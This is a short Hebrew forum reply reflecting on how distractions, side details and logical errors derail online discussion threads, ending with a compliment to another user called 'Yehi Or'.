מתוך הדברים נמצאתי למד שיש בעיות בדיון שאין להן פתרון הנראה לעין. אולי יכול היה להיות פתרון בפורמט אחר של מבנה אשכול, מהסוג שקיים ב"תפוז" ובעוד מקומות, המאפשר להתפצל מתגובה לדיון משני עליה. אבל גם זה לא יועיל מפני שהתגובות משולבות יחד.
באמת מה עושים עם הסחות דעת, פרטים טפלים, טעויות לוגיות? אין מנוס מהתייחסות ענינית אליהן, למרות שזה רק מאריך את הדיון ומפריע למיקוד במה שבעל האשכול רצה להעלות לדיון. אם זה באמת כך, אם זה האופן שבו מתנהלים דיונים באורח בלתי נמנע, אולי צריך לקבל זאת בהבנה, באהבה. למרות שבעיני המטרה שלנו היא לקדם הפיכה של תחושותינו והאינטואיציות שלנו לטיעונים מסודרים ולכן הבדלה בין הטפל לעיקר. זה כיוון מחשבה חדש עבורי.
*** יהי אור
כרגיל דבריך מעמיקים ומספקים נקודות חדשות או מבט חדש שיש להתבונן בהם.
|
|
|
|
|